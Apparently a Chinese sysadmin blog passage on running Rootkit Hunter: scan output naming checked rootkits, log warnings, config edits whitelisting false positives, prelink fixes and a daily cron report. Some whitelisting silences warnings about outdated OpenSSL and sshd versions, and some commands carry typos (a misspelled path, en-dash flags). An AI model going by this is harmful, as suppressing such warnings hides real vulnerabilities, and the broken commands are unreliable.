SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
trNkit Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
Vampire Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
Xzibit Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]
ZK Rootkit [ Not found ]
Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]
Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]
Performing Linux specific checks
Checking loaded kernel modules [ OK ]
Checking kernel module names [ OK ]
Checking the network...
Performing checks on the network ports
Checking for backdoor ports [ None found ]
Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks
Checking for local host name [ Found ]
Checking for system startup files [ Found ]
Checking system startup files for malware [ None found ]
Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]
Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Not allowed ]
Checking if SSH protocol v1 is allowed [ Not allowed ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]
Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...
Checking version of GnuPG [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ Warning ]
System checks summary
=====================
File properties checks...
Files checked: 135
Suspect files: 5
Rootkit checks...
Rootkits checked : 253
Possible rootkits: 0
Applications checks...
Applications checked: 4
Suspect applications: 2
The system checks took: 1 minute and 38 seconds
All results have been written to the log file (/var/log/rkhunter.log)
One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter.log)

相应产生的日志
# cat /var/log/rkhunter.log |grep Warning

[13:52:20] /sbin/ifdown [ Warning ]
[13:52:20] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[13:52:20] /sbin/ifup [ Warning ]
[13:52:20] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
[13:52:34] /usr/bin/groups [ Warning ]
[13:52:34] Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
[13:52:35] /usr/bin/ldd [ Warning ]
[13:52:35] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
[13:52:39] /usr/bin/whatis [ Warning ]
[13:52:39] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
[13:53:44] Checking for hidden files and directories [ Warning ]
[13:53:44] Warning: Hidden directory found: /dev/.udev
[13:53:44] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[13:53:44] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
[13:53:44] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[13:53:44] Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
[13:53:45] Checking version of OpenSSL [ Warning ]
[13:53:45] Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
[13:53:45] Checking version of OpenSSH [ Warning ]
[13:53:45] Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.

三.修正误报
可以看到上面信息基本为误报

还有更新了部分包可能会因起No hash value found错误;
grep是安装nginx时更新了pcre
amd是安装sasl认证

Warning: No hash value found for file '/bin/egrep' in the rkhunter.dat file.
Warning: No hash value found for file '/bin/fgrep' in the rkhunter.dat file.
Warning: No hash value found for file '/bin/grep' in the rkhunter.dat file.
Warning: No hash value found for file '/usr/sbin/amd' in the rkhunter.dat file.

使用prelink可以查看

# prelink --verify --sha /bin/egrep
prelink: /bin/egrep: at least one of file's dependencies has changed since prelinking
# prelink /bin/egrep
prelink: /usr/local/lib/libpcre.so.0.0.1 is not present in any config file directories, nor was specified on command line
# prelink --verify --sha /usr/sbin/amd
prelink: /usr/sbin/amd: at least one of file's dependencies has changed since prelinking
# prelink /usr/sbin/amd
prelink: /usr/local/sasl2/lib/libsasl2.so.2.0.22 is not present in any config file directories, nor was specified on command line
Aborted

cp /usr/local/rkhunter/etc/rkhunter.conf{,.bak}
网上部分脚本已失效,我对此作了些修改

sed -i 's/#SCRIPTWHITELIST=\/sbin\/ifup/SCRIPTWHITELIST=\/sbin\/ifup/' /opt/rthunter/etc/rkhunter.conf
sed -i 's/#SCRIPTWHITELIST=\/sbin\/ifdown/SCRIPTWHITELIST=\/sbin\/ifdown/' /opt/rthunter/etc/rkhunter.conf
sed -i '/#SCRIPTWHITELIST="\/sbin\/ifup/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#SCRIPTWHITELIST="\/usr\/bin\/groups"/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#ALLOWHIDDENDIR="\/etc\/.java"/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#ALLOWHIDDENDIR="\/dev\/.mdadm"/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#ALLOWHIDDENDIR="\/dev\/.udev/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#ALLOWHIDDENFILE="\/usr\/share\/man\/man1\/..1.gz"/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#ALLOWHIDDENFILE="\/usr\/bin\/.fipscheck.hmac"/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#ALLOWHIDDENFILE="\/usr\/bin\/.ssh.hmac"/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
sed -i '/#ALLOWHIDDENFILE="\/usr\/sbin\/.sshd.hmac"/ {s/^#//g}' /usr/local/rkhunter/etc/rkhunter.conf
echo 'IGNORE_PRELINK_DEP_ERR="/bin/egrep /bin/fgrep /bin/grep /usr/sbin/amd /usr/bin/less" ' >> /usr/local/rkhunter/etc/rkhunter.conf
echo 'SCRIPTWHITELIST=/usr/bin/ldd' >> /usr/local/rkhunter/etc/rkhunter.conf
echo 'SCRIPTWHITELIST=/usr/bin/whatis' >> /usr/local/rkhunter/etc/rkhunter.conf
echo 'SCRIPTWHITELIST=/usr/bin/GET' >> /usr/local/rkhunter/etc/rkhunter.conf
echo 'ALLOWHIDDENFILE=/usr/share/man/man5/.k5login.5.gz' >> /usr/local/rkhunter/etc/rkhunter.conf
echo 'APP_WHITELIST="openssl:0.9.8e sshd:4.3p2"' >> /usr/local/rkhunter/etc/rkhunter.conf
echo 'ALLOWDEVFILE="/dev/shm/nginx.pid"' >> /usr/local/rkhunter/etc/rkhunter.conf
#注意openssl和sshd的版本号

再次更新和检测
/usr/local/rkhunter/bin/rkhunter –propupd

[ Rootkit Hunter version 1.3.8 ]
File updated: searched for 164 files, found 135

跳过按键只输出warning,不再有显示
/usr/local/rkhunter/bin/rkhunter -c –sk –rwo

四.自动报告
每天5点检测并发送通知邮件
vi /var/spool/cron/root

3 5 * * * (/usr/local/rkhunter/bin/rkhunter --cronjob -l --nomow --rwo | mail -s "[rkhunter] report `hostname` `date`" root@localhost)

参考:http://sourceforge.net/apps/trac/rkhunter/wiki/SPRKH#Introduction

===============2012-4-18更新
修正应更新而产生的误报,运行时检查文件存,如果文件不存在就不要加在里面

ALLOWDEVFILE="/dev/shm/nginx.pid"
IGNORE_PRELINK_DEP_ERR="/bin/egrep /bin/fgrep /bin/grep /usr/sbin/amd /usr/bin/less"

hdparm 的Xzibit Rootkit

[15:29:12] Warning: Checking for possible rootkit strings [ Warning ]
[15:29:12] Found string 'hdparm' in file '/etc/rc.d/rc.sysinit'. Possible rootkit: Xzibit Rootkit

RTKT_FILE_WHITELIST="/etc/rc.d/rc.sysinit:hdparm"

===============2012-4-28更新
修正The file properties have changed
rkhunter在crontab中运行和手功运行有差异
就算你在配置文件中写了IGNORE_PRELINK_DEP_ERR,在日志中还是会有
[05:45:10] /usr/bin/less [ Warning ]
[05:45:10] Warning: The file properties have changed:

prelink /usr/bin/less

prelink: /usr/local/lib/libpcre.so.0.0.1 is not present in any config file directories, nor was specified on command line

#增加库链接
echo ‘-l /usr/local/lib’ >> /etc/prelink.conf
#再次执行就没错了，把每个prelink出错的命令都运行下
prelink /usr/bin/less

#修改配置文件将IGNORE_PRELINK_DEP_ERR 提到USER_FILEPROP_FILES_DIRS下面
#再rkhunter –propupd更新
#使用conrtab调试不再报错